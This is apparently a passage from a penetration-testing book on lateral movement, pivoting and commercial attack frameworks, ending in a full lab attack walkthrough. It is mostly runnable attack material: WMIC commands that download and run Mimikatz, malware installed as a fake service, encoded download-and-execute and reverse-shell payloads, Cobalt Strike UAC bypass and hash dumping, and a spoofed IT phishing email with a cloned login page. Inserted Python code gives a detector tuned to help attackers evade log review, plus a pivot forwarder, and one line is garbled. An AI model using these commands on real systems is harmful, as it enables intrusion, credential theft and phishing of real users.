WMI lets us start a process on a remote host (through the Win32_Process class's Create method), and that process can be PowerShell. The benefit of this approach is that the PowerShell script is downloaded and run entirely in memory on the remote host; apart from the output file we write, nothing touches its disk, which gets past most anti-virus. In the examples below, we supply credentials to wmic to execute our commands:

• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"

• dir \\win8\c$\Users\Public\

• type \\win8\c$\Users\Public\a.txt

• del \\win8\c$\Users\Public\a.txt

In the image below, we are currently on the host win7. We execute a wmic call to remotely run a PowerShell script against the host win8. This command runs Mimikatz and dumps the credentials to a file on the remote host. Once it completes, we read the file from our win7 host over the C$ share and then delete it. Two things to keep in mind: the password is passed on the wmic command line, so it shows up in any process command-line logging on win7, and a.txt holds clear-text credentials on win8, so do not skip the del step.



C:\Users\testuser1>hostname
win7

C:\Users\testuser1>wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1328;
        ReturnValue = 0;
};

C:\Users\testuser1>type \\win8\c$\Users\Public\a.txt

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 20 2014 08:56:48)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz                     (oe.eo)
  '#####'                                    with 14 modules * * */


Moving Laterally with WMI 


Moving Laterally Using Services 

Another way to move laterally is to move and execute a file on another system to which you have 
access. We heavily used PowerShell to download and execute files in prior examples. However, you 
might come across that one system that doesn't have PowerShell enabled. In the next command, we 
will copy our malware to the remote host’s public folder: 

• copy malware.exe \\[Remote Machine]\C$\users\public 

Then, we will create a service called Antivirus, and configure that service to execute our malware: 

• sc \\[Remote Machine] create Antivirus binpath= "c:\users\public\malware.exe" 

o Make sure to add the space between binpath= and your executable. 

Lastly, we can start that service with: 

• sc \\[Remote Machine] start Antivirus 


C:\Users\testuser1\Desktop>copy malware.exe \\win8\C$\users\public
        1 file(s) copied.

C:\Users\testuser1\Desktop>sc \\win8 create Antivirus binPath= "c:\users\public\malware.exe"
[SC] CreateService SUCCESS

C:\Users\testuser1\Desktop>sc \\win8 start Antivirus


Creating Malicious Services 


Remember that you will need a privileged account on the remote machine that can create services and start/stop them. Also expect "sc start" to report "[SC] StartService FAILED 1053" (the service did not respond in time): malware.exe is not a real service binary, so the Service Control Manager gives up waiting for it, but the process has already been launched. Have the payload migrate or spawn into another process promptly, as Metasploit's psexec modules do, rather than trusting a process the SCM considers failed, and remove the service with "sc \\[Remote Machine] delete Antivirus" when you are done.
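The service route and the psexec_psh module earlier in this section leave the same footprint on the target: the System event log records Event ID 7045 ("A service was installed in the system") with the service name and the image path. The Python below is an added example, not something from this book or from any product it mentions. It runs two checks that defenders commonly apply to 7045 records, an image path under a user-writable directory and a service "binary" that is really a command interpreter (with or without an encoded command), over a handful of records constructed for this example. The dictionary keys (EventID, Computer, ServiceName, ImagePath, AccountName) are this example's own naming, modelled on the event's message fields, and the service name HwCVtlZi and the base64 fragment are made up in the style of what psexec leaves behind. As the attacker, it tells you which of the steps above will stand out in a log review.

```python
import re

# Constructed Event ID 7045 records (plus one unrelated 7036 record). Field
# names are this example's own, modelled on the event's message fields.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WIN8", "ServiceName": "Antivirus",
     "ImagePath": r"c:\users\public\malware.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WIN7", "ServiceName": "HwCVtlZi",      # made-up random-style name
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
                  "-e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBi",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WIN8", "ServiceName": "VBoxService",
     "ImagePath": r"C:\Windows\System32\VBoxService.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "Computer": "WIN8", "ServiceName": "Antivirus",        # state change, not an install
     "ImagePath": "", "AccountName": ""},
]

# Path fragments a standard user can write to; a service binary there is either malware or a mistake.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
# cmd.exe, %COMSPEC% or powershell.exe as the service binary: never what a real service looks like.
INTERPRETER = re.compile(r"%comspec%|\bcmd(?:\.exe)?\b|\bpowershell(?:\.exe)?\b", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_CMD = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)


def service_install_findings(event):
    """Reasons a single record looks like lateral-movement tradecraft (empty list = clean)."""
    if event.get("EventID") != 7045:
        return []
    path = event.get("ImagePath", "")
    reasons = []
    if any(marker in path.lower() for marker in USER_WRITABLE):
        reasons.append("image path in a user-writable directory")
    if INTERPRETER.search(path):
        if ENCODED_CMD.search(path):
            reasons.append("service binary is an interpreter running an encoded command")
        else:
            reasons.append("service binary is a command interpreter, not a service executable")
    return reasons


def triage_events(events):
    """Map (computer, service name) -> reasons, for every flagged 7045 record."""
    flagged = {}
    for ev in events:
        reasons = service_install_findings(ev)
        if reasons:
            flagged[(ev["Computer"], ev["ServiceName"])] = reasons
    return flagged


if __name__ == "__main__":
    for (host, svc), why in triage_events(SAMPLE_EVENTS).items():
        print("%s  %-12s %s" % (host, svc, "; ".join(why)))
```

Both of the techniques on this page trip a rule: the "Antivirus" service because its binary lives in C:\users\public, and the psexec_psh-style service because its binary path is cmd launching PowerShell with an encoded command. A service binary that has been copied into C:\Windows\System32 under a plausible name passes both checks, which is the difference between a quick lab win and tradecraft that survives a log review.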






Proxy Between Hosts 

Let's say you are on the network, but you cannot reach to specific subnets because they are only 
allowed access by certain user machines or IPs. In these cases, you will have to proxy off a user with 
the proper IPs or access. 


Windows: 

One of the cheap and easy ways to proxy between hosts in segmented networks is to use a built-in Windows function. Netsh is a command line tool for modifying network configuration. The following command puts the host in listening mode on port 8080 and redirects every connection to 192.168.5.33 on port 3389. This is an easy way to proxy RDP traffic into other hosts. Remember that you need elevated privileges to run these commands, the host firewall has to allow inbound connections to the listen port, and portproxy depends on the IP Helper service (iphlpsvc), so check that it is running if the listener never answers.

You can either use WMIC to execute this remotely or, if you already have a shell, run the following command:

• netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.5.33

If you want to do it straight through netsh remotely, first allow remote administration with a local account (LocalAccountTokenFilterPolicy turns off UAC token filtering for remote connections by local administrators), start the services netsh needs on the remote host, then point netsh at the remote machine:

• reg add \\<Remote IP>\HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

• sc \\<Remote IP> start remoteregistry

• sc \\<Remote IP> start remoteaccess

• netsh

• set machine <Remote IP>

• interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.5.33

You can list what you have added with "netsh interface portproxy show all" and remove it with "netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0"; leave nothing behind at the end of the test. The great part about the netsh port proxy is that it also supports IPv4 to IPv6 proxying. You can now take one of the compromised hosts and proxy your RDP requests into that segmented network.(57)

Linux: 

The old but always faithful way of proxying through Linux uses Netcat and a backpipe. On the victim host through which you want to proxy, run the following commands.(58)

• mknod backpipe p

• nc -l -p 8080 0<backpipe | nc 10.0.18.134 3389 | tee backpipe

In the example above, we proxy through the compromised host by connecting to port 8080. This forwards the connection to an RDP service at IP 10.0.18.134. The pipeline serves one client and then exits, so wrap it in a loop (or rerun it) if you need more than one connection, and note that some Netcat builds reject -p together with -l and want "nc -l 8080" instead.
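The netcat backpipe above handles a single client and has to be restarted after every connection, and netsh portproxy has no stock equivalent on a Linux pivot. The Python below is an added example, not from this book or from any tool it mentions: a small TCP forwarder that does what the portproxy and backpipe commands do (listen on one port, relay each inbound connection to a fixed target host and port in both directions, many clients at once, with nothing but the standard library). To keep it runnable offline, the demo stands up a throwaway echo service on 127.0.0.1 in place of the RDP host and relays two connections through the forwarder; on a real pivot you would call start_forwarder("0.0.0.0", 8080, "10.0.18.134", 3389) and leave the event loop running.

```python
import asyncio


async def _relay(reader, writer):
    """Copy bytes from reader to writer until EOF, then close that direction."""
    try:
        while True:
            chunk = await reader.read(65536)
            if not chunk:
                break
            writer.write(chunk)
            await writer.drain()
    except (ConnectionError, asyncio.IncompleteReadError):
        pass                                    # peer went away; the other direction will notice too
    finally:
        writer.close()


async def _handle_client(client_reader, client_writer, target_host, target_port):
    """One inbound connection: dial the target, then pump both directions concurrently."""
    try:
        target_reader, target_writer = await asyncio.open_connection(target_host, target_port)
    except OSError:
        client_writer.close()                  # target unreachable: drop this client, keep listening
        return
    await asyncio.gather(
        _relay(client_reader, target_writer),  # client -> target
        _relay(target_reader, client_writer),  # target -> client
    )


async def start_forwarder(listen_host, listen_port, target_host, target_port):
    """Equivalent of: netsh interface portproxy add v4tov4 listenport=... connectaddress=..."""
    return await asyncio.start_server(
        lambda r, w: _handle_client(r, w, target_host, target_port),
        listen_host, listen_port)


# --- offline demo: a throwaway echo service stands in for the RDP host ---
async def _echo_once(reader, writer):
    data = await reader.read(65536)
    writer.write(data)
    await writer.drain()
    writer.close()


async def _demo():
    echo = await asyncio.start_server(_echo_once, "127.0.0.1", 0)     # port 0: let the OS pick
    echo_port = echo.sockets[0].getsockname()[1]
    fwd = await start_forwarder("127.0.0.1", 0, "127.0.0.1", echo_port)
    fwd_port = fwd.sockets[0].getsockname()[1]
    replies = []
    for msg in (b"first client", b"second client"):                 # two consecutive clients
        r, w = await asyncio.open_connection("127.0.0.1", fwd_port)
        w.write(msg)
        await w.drain()
        replies.append(await r.read(65536))
        w.close()
        await w.wait_closed()
    fwd.close()
    echo.close()
    await fwd.wait_closed()
    await echo.wait_closed()
    return replies


def demo():
    """Returns the payloads echoed back through the forwarder, one per client connection."""
    return asyncio.run(_demo())


if __name__ == "__main__":
    print(demo())
```

Unlike the backpipe, each direction is shut down independently when its side sends EOF, so RDP's long-lived sessions and quick one-shot probes both work, and a second client connecting while the first is still active gets its own pair of relays instead of corrupting the FIFO.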


Commercial Tools: 



So far, I have talked about many open source tools. Now, I want to also mention their commercial 
counterparts. This is solely to build awareness of what is available out there as a resource. I am 
frequently asked if it is better to go totally open source or commercial products. There is no right or 
wrong answer. What is important is that you do not limit yourself to one side or the other, but instead, 
find the processes, tools, and techniques that are right for that particular job. 


Cobalt Strike: 


Cobalt Strike is one of my favorite tools for a multitude of reasons. Cobalt Strike sits on top of the Metasploit Framework and can attack, pivot, evade AV, establish persistence and, most importantly, provide custom payloads (such as Beacon). More on Beacon here: 
http://www.advancedpentest.com/help-beacon . The main reason I recommend that all pentesters look into Cobalt Strike is the way its C2 can communicate over DNS. Networks are starting to thoroughly regulate what traffic can leave the network with tools such as Next-Generation Firewalls. Beacon uses DNS, which almost every network already has to let out, to ride the existing infrastructure past a lot of the network security detection tools.

New Cobalt Strike licenses cost $3,500 per user for a one-year license. License renewals cost 
$2,500 per user, per year. You can get a 21-day trial license by going to: 

http://www.advancedpentest.com/ 

A lot of the attacks discussed in this book-such as keyloggers, pivoting, AV evasion-are incorporated 
into Cobalt Strike in an easy-to-use fashion. The best part is that you are able to see your attacks 
visually, while having full command line, as you would with msfconsole. It is really the best of both 
worlds. 


Getting Started with Cobalt Strike: 

• http://www.advancedpentest.com/download

• mv cobaltstrike-trial.tgz /opt/

• cd /opt/

• tar zxvf cobaltstrike-trial.tgz

• update-java-alternatives --jre -s java-1.7.0-openjdk-i386







Cobalt Strike 


Creating a Windows Executable: 


Cobalt Strike 



Cobalt Strike - Beacons 


• Go to View —> Beacons 

• You will see a listing of all available Beacons 

• Interact with your currently active Beacon 

• Inside the Beacon Command Prompt, type BypassUAC and select the 
beacon_payload 


























[Screenshot: Cobalt Strike, Beacon 172.16.151.202@2908, "Choose a listener" dialog for BypassUAC: listener beacon_payload, payload windows/beacon_http/reverse_http]





Cobalt Strike - BypassUAC 


If we go back to the Beacons list, we will see our new Beacon connection with an asterisk (*) next to 
it. 


[Screenshot: Cobalt Strike Beacons tab after BypassUAC]

external        internal        user         computer  note  pid   last
172.16.151.202  172.16.151.202  testuser1 *  WIN7            2712  59s
172.16.151.202  172.16.151.202  testuser1    WIN7            2908  859ms


Cobalt Strike - New Beacon 


If we interact with this Beacon, we can do the normal commands:

• help - get a listing of all the commands

• getsystem - elevate to SYSTEM

• ps - list processes

• steal_token - steal the access token of a process, for example one running as a Domain Admin user

• spawn - spawn a new session

• sleep 0 - make the Beacon check in continuously (interactive) instead of on its slow interval

• mode http - switch the Beacon's data channel to HTTP; the book uses sleep 0 and mode http together before dropping into Meterpreter

• meterpreter - drop into a Meterpreter session

























beacon> help
...
spawn          spawn a session
spawnto        Set executable to spawn processes into
steal_token    Steal access token from a process
task           Download and execute a file from a URL
timestomp      Apply timestamps from one file to another
unlink         Disconnect from parent Beacon
upload         Upload a file

beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 14 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

[Screenshot: the Beacon for HACKER\testuser1 @ WIN7 (172.16.151.202) next to the Metasploit escalate modules (droplnk, getsystem, ms10_073_kbdlayout, net_runtime_modify, screen_unlock) and a Meterpreter 3 tab running the Dump Hashes post module:]

[*] Post module running as background job
[*] Running module against WIN7
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20150115014752_default_172.16.151.202_windows.hashes_429476.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99fc163...
[*] Obtaining the user list and keys...
[*] Handle is invalid, retrying...
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99fc163...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win7:1000:aad3b435b51404eeaad3b435b51404ee:1c96c42db88e6248094db1f2958732c8:::


Cobalt Strike - Compromised Hosts 


The real benefit of Beacon is that it is a low and slow attack. You can configure it to do all your command and control, and exfiltration, over DNS with all the functionality of Metasploit.


Benefits: 

• Meterpreter in memory over Beacon 

• Beacon is low and slow 

• Full communication over DNS - no direct communication to the attacker host 

• Beacon uses Cobalt Strike's Artifact Kit to generate an anti-virus safe DLL for 
BypassUAC 

• Custom Office Files with Payloads (Word/Excel) 

• Phishing 

• Really easy to use with PowerShell

• Creating Executables to Bypass AV 

• Team mode 

o Connect multiple clients to a single server to share exploited systems 
and work together 

o http://www.advancedpentest.com/help-setup-collaboration 

Without going through all the examples, I highly recommend watching these videos:

• Deliver DNS Trojan with Microsoft Office Macro: 
https:// www.youtube.com/ watch?feature=player_embedded&v=Ex_bvwMDDbO 

• Cobalt Strike Training: http://www.advancedpentest.com/training 


Conclusion: 

Cobalt Strike is a must-have for a penetration tester. It heavily utilizes the Metasploit Framework, but 
extends it significantly. The penetration game is changing and what used to be smash-and-grab 
penetration testing is now about low and slow. 


Immunity Canvas 

( http://www.immunityinc.com/products/canvas/ ) (Kali Linux/OS X/Windows)


Immunity's Canvas makes available hundreds of exploits, an automated exploitation system, and a 
comprehensive, reliable exploit development framework to penetration testers and security 
professionals worldwide.(59) 


Similar to Metasploit’s framework, Canvas is built to be very flexible and is easy to build upon. 
Instead of being built on Ruby, as with the Metasploit Framework, Canvas is built on Python. The 
GUI is built on top of pyGTK. Canvas’ bread and butter is the fact that it uses MOSDEF. MOSDEF is 
a custom C compiler for payload construction. This allows attackers the ability to write additional 
code in the memory of the exploited host without having to touch the disk. 


Executing Canvas is pretty straightforward and once you have identified a vulnerability, exploiting it 






is very much like Metasploit. In the following example, I will build a callback trojan and execute it 
on a victim machine. 


[Screenshot: the Canvas GUI with the BUILDCALLBACKTROJAN module selected ("Creates an executable that will call back to MOSDEF"); current callback 192.168.199.128, target OS Windows, architecture x64, with the callback port and output filename set in the module dialog]


Canvas 


Why get Canvas? Not only for the easy-to-build custom exploits, but for the ease of use in exploiting 
vulnerabilities and for the number of default custom exploits. Numerous times I have searched for a 
specific exploit on the Security Focus site and find no available public exploits for that vulnerability. 
However, browsing through Immunity Canvas’ repository, I will find the exact exploit I need. 


[Screenshot: the SecurityFocus entry "Cacti Multiple Unspecified Security Vulnerabilities", whose exploit tab reads: "Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com."]


No Exploit Found on SecurityFocus 









[Screenshot: Canvas module CVE-2014-5261, "Post-Auth CMDi in Cacti 0.8.8b"; arch Linux/All, type Web Exploits, vendor The Cacti Group. Notes: this is a post-authentication command injection vulnerability in Cacti 0.8.8b; valid credentials with the permissions to update the 'Global Settings' are required for this module to execute successfully, and the injection is blind.]

Exploit Available Through Canvas 

For me, I use Canvas for the 0-day exploits. Immunity has partnered with:

• Gleg - Agora

• Gleg - SCADA+

• DSquare - D2

• Intevydis - VulnDisco

• Enable Security - VoIPPack


[Screenshot: the Canvas exploit pack module list filtered on CVE-2014, including CVE-2014-5261, CVE-2014-5460, drupal_name_sqli, drupal_name_sqli_callback, linux_futex_requeue, linux_pppol2tp, linux_tty_race and ms14_040]



These guys provide monthly 0-day exploits for research they are working on. For example, D2 
focuses mostly on web 0-day exploits, while VulnDisco focuses mostly on service type 
vulnerabilities. For more information, go to: 

http://www.immunityinc.com/products/canvas/canvas-exploit-packs-overview.html 


Conclusion: 

Canvas is a great toolkit to have in your bag. The fact that it uses Python as its core makes it easy for 
many penetration testers to build their own modules and exploits. If you are looking for someone else 
to do a lot of the 0-day research on third party software, I highly recommend investing in Canvas. 


Core Impact 

( http://www.coresecurity.com/core-impact-pro )

The last commercial tool I want to discuss is Core Impact. Core is probably one of the most expensive tools you can have in your offensive testing bag, but it is worth the price. Core Impact allows for easy automation of exploitation and, by Core's own claim, covers 25% more unique CVEs (Common Vulnerabilities and Exposures entries) than its competitors.


For those who are really looking for a more automated visual approach, Core Impact is for you. It is 
an all-in-one tool to attack web, network, mobile, client and even wireless. Remember the good old 
days of auto-pwn? Well, Core has taken this to another level. With a click of a button, it is able to 
scan, compromise, take hashes/passwords, persistence and more. 
[Screenshot: the Core Impact installed package list, including a CVE Database Update package]

Core Impact


Core Impact is modular like Metasploit, where you can pick and choose exploits to attack victim machines. The greatest benefit of Core Impact is that it is easy to use. Honestly, going through a network test is as easy as clicking on: 1) Network Information Gathering, 2) Network Attack and Penetration, 3) Local Info Gather, and so on. Their exploits are well-tested, actively work on IDS/AV evasion, and perform most of the local information gathering that you would do on a penetration test. It takes most of the manual work out of the test.

The example below shows that I have compromised a host and kicked off the Local Information 
Gathering module. Core Impact automatically starts pulling local system information and passwords 
from common software that store passwords (browsers, Putty, Outlook), runs Mimikatz and more. 
Core Impact - Exploitation


Conclusion: 

Core Impact not only has a number of well-tested exploits that are not available on the open source platforms, but it is also easy to use throughout the whole pentesting cycle, which makes it a powerful tool.
















Two-Minute Drill - From Zero To Hero 


Since the last book, I thought it would be helpful to include a walkthrough of a full attack. Here’s the 
scenario: You are on Day 5 of your test and you haven’t been able to exploit the SUCK network. It’s 
time for the two-minute drill. You have two minutes left and you need to go from your ten-yard line 
and cover the next 90 yards. This isn’t the only way or even the best way of doing a penetration test, 
but it is one theoretical attack path. 


Ten-Yard Line: 


First, we need to get email addresses by using Discover and Recon-NG from the Before the Snap 
section. This results in a handful of email addresses. Through testing, we have figured out that emails 
with an Office extension (docx, pptx, xlsx) do not pass through their mail filter. 


[Screenshot: the Discover passive recon report (passive-recon.htm) for suck.testlab. Summary: Emails 18, Names 87, Hosts 9, Squatting 48, Subdomains 32. The 18 addresses include role accounts such as support@suck.testlab, feedback@suck.testlab and opensource@suck.testlab, and personal ones such as jay@, joe@, mark@, mike@, ron@, sammy@, sbaker@, sfrench@ and synack@suck.testlab. The names list starts with Ackerson, Adelson and Ahuja.]
w'p<vs«»e-fe<on him _ 

Gathering Email Addresses 


Twenty-Yard Line: 


We then go to The Screen section and use SET to set up a fake website, which clones their Outlook Web Application (OWA) external site. Then we use the script from /opt/spearphishing/client/spear.py to send out multiple spoofed emails from IT.







[Screenshot: the cloned Outlook Web App logon page served from https://fake.suck.testlab/owa/auth/logon.aspx, with "victim@suck.testlab" already typed into the user name field.]

The spoofed email sent to the targets:

Subject: Outlook Web Upgrade

IMPORTANT

Due to a recent rise in security breaches in our industry, we have upgraded our Outlook Mail system.

Please visit https://suck.testlab.com/owa to make sure you can still login. Failure to do so may result in your account being locked out.

Thank you for your co-operation,
IT Security

This email may contain confidential and privileged information for the sole use of the intended recipient. Any review or distribution by others is strictly prohibited. If you are not the intended recipient, please contact the sender and delete all copies. Thank you.


Spear phishing 


Afterwards, we obtain a few passwords and validate that we can log into OWA. Now that we are on their internal mail system, we can skip the email proxy and send files from one user to another as Microsoft Excel documents.


Thirty-Yard Line: 


Going back to the Special Teams section, create a malicious Excel file using Generate-Macro.ps1. This places a PowerShell reverse HTTPS Meterpreter script onto the victim host and makes a registry entry to add persistence on reboot.

With that Excel file, we log into the accounts we captured to see with whom they are communicating. 
Since we need the user to click the “Enable Macros” button, we need to find and build a trust 
relationship. Therefore, look for someone who has had conversations in the past and make our Excel 
files look like the ones they are sending back and forth. In the reply email, make sure you specify that 
the recipient opens the Excel file and clicks on the “Enable Macros” button. 


Before they open the email, we need to start up a Meterpreter handler. We kick off Easy-P, and select 
PowerShell Meterpreter to create the code for a resource listener file. With a quick msfconsole -r 
listener.rc, we now have a full handler running. 




















Once the victim opens our malicious file, we get a Meterpreter shell! 


msf exploit(handler) >
[*] 192.168.199.1:24153 Request received for /INITM...
[*] 192.168.199.1:24153 Staging connection for target /INITM received...
[*] Meterpreter session 3 opened (192.168.199.128:443 -> 192.168.199.1:24153)

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > shell
Process 16676 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


Meterpreter Shells from Spear phishing 


Fifty-Yard Line: 


Sadly, we find out we are a power user with limited rights. We won't be able to dump hashes just yet. So, we run PowerUp from a shell to see if there is any way to get to SYSTEM:


C:\Users\testuser1>powershell -version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/…/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking for unquoted service paths...
[+] Use 'Write-ServiceBinary' to abuse
[+] Unquoted service path: … - C:\Program Files\…

[*] Checking service executable permissions...
[+] Use 'Write-ServiceEXE -ServiceName SVC' to abuse
[+] Vulnerable service executable: … - "C:\Program Files\…"

[*] Checking service permissions...

[*] Checking for unattended install files...

[*] Checking for potentially hijackable .dll locations...
[+] Hijackable .dll path: C:\Program Files\…Fingerprint Manager…\
[+] Hijackable .dll path: C:\…\

[*] Checking for AlwaysInstallElevated registry key...


Privilege Escalation 


Luckily, we find an unquoted service path and a Write-ServiceEXE issue. We ran PowerUp to abuse those vulnerabilities, create a new user, and restart the service. A quick "runas" command lets us kick off another PowerShell Invoke-Shellcode Meterpreter using the administrative account we just created. With a quick bypassuac injection and getsystem in Meterpreter, we are now SYSTEM!


We jump back to Easy-P and generate a Mimikatz command: 


==Easy-P==

[1] Privilege Escalation
[2] Lateral Movement
[3] Keylogging
[4] PowerShell Meterpreter
[5] Change Users Execution Policy
[6] Powershell 101
[7] Base64 Encode a PowerShell Script
[8] Mimikatz - Passwords from Memory
[99] Exit/Quit

Select An Option: 8

[*] Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

[*] Base64 encoded version download and execute:

Powershell.exe -NoP -NonI -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBj
AHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBu
AGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABl
AG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0
AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0
AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AA==


PowerShell - Invoke Mimikatz 


When we run the PowerShell Invoke-Mimikatz as system, we can grab the user password from 
memory. 


C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 20 2014 08:56:48)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz                     (oe.eo)
  '#####'                                    with 14 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 305524 (00000000:0004a974)
Session           : Interactive from 1
User Name         : testuser1
Domain            : HACKER
SID               : S-1-5-21-3525058729-1821581466-2040179600-1106
        msv :
         [00000003] Primary
         * Username : testuser1
         * Domain   : HACKER
         * NTLM     : 0aa3d8c4a87962d9356e09480de5ebbe
         * SHA1     : 91fd3da0e2456fb1d31663b9385e881e705a561c
        tspkg :
         * Username : testuser1
         * Domain   : HACKER
         * Password : !Asdfasdfasdf1!
        wdigest :
         * Username : testuser1
         * Domain   : HACKER
         * Password : !Asdfasdfasdf1!
        kerberos :
         * Username : testuser1
         * Domain   : HACKER.TESTLAB
         * Password : !Asdfasdfasdf1!


Passwords from Memory 


Seventy-Yard Line: 






Now that we have the user's password, let's find out who the Domain Admins are. From a shell, we type:

• net group "Domain Admins" /domain

C:\Users\testuser1>net group "Domain Admins" /domain
The request will be processed at a domain controller for domain hacker.testlab.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            lab
The command completed successfully.

From the results, we see that "lab" is a domain admin. Let's see where he is logged in. In the Lateral Pass section, we looked at PowerView and its UserHunter functionality. It queries Active Directory for hosts and checks which users are logged in to each individual host:

• Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-UserHunter -UserName "lab"


C:\Users\testuser1>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/…/PowerTools/master/PowerView/powerview.ps1'); Invoke-UserHunter -UserName "lab"
[*] Running Invoke-UserHunter with delay of 0
[*] Using target user 'lab'...
[*] Total number of hosts: 3
[+] Target user 'lab' logged into WIN8.hacker.testlab (172.16.151.201)
[+] Target user 'lab' logged into WIN8.hacker.testlab (172.16.151.201)
[+] Target user 'lab' logged into WIN8.hacker.testlab (172.16.151.201)
[+] Target user 'lab' logged into WIN8.hacker.testlab (172.16.151.201)
[+] Target user 'lab' logged into DC.hacker.testlab (172.16.151.200)
[+] Target user 'lab' logged into DC.hacker.testlab (172.16.151.200)


Finding Which Computer the Domain Administrator is on 


We know we can’t log into the Domain Controller, but we do have access to the Win8 host. To move
laterally, we can execute commands on remote hosts using WMIC. The payload we want to execute is
a PowerShell Meterpreter on that particular host:

• IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit
-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -
Lhost 172.16.151.128 -Lport 8080 -Force


I want to reiterate one note, as I see it happen a lot with PowerShell. If you are attacking a Windows
32-bit vs. 64-bit system through WMIC, they may require different commands. The first command is
targeting 32-bit systems and the second command below targets 64-bit systems:

• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!"
/NODE:172.16.151.202 process call create "powershell -EncodedCommand
SQBFAFgAIAAoAE4AZQB3AC0A...AAwACAALQBGAG8AcgBjAGUA"

• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!"
/NODE:172.16.151.201 process call create
"%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -enc
SQBFAFgAIAAoAE4AZQB3AC0A...AAwACAALQBGAG8AcgBjAGUA"



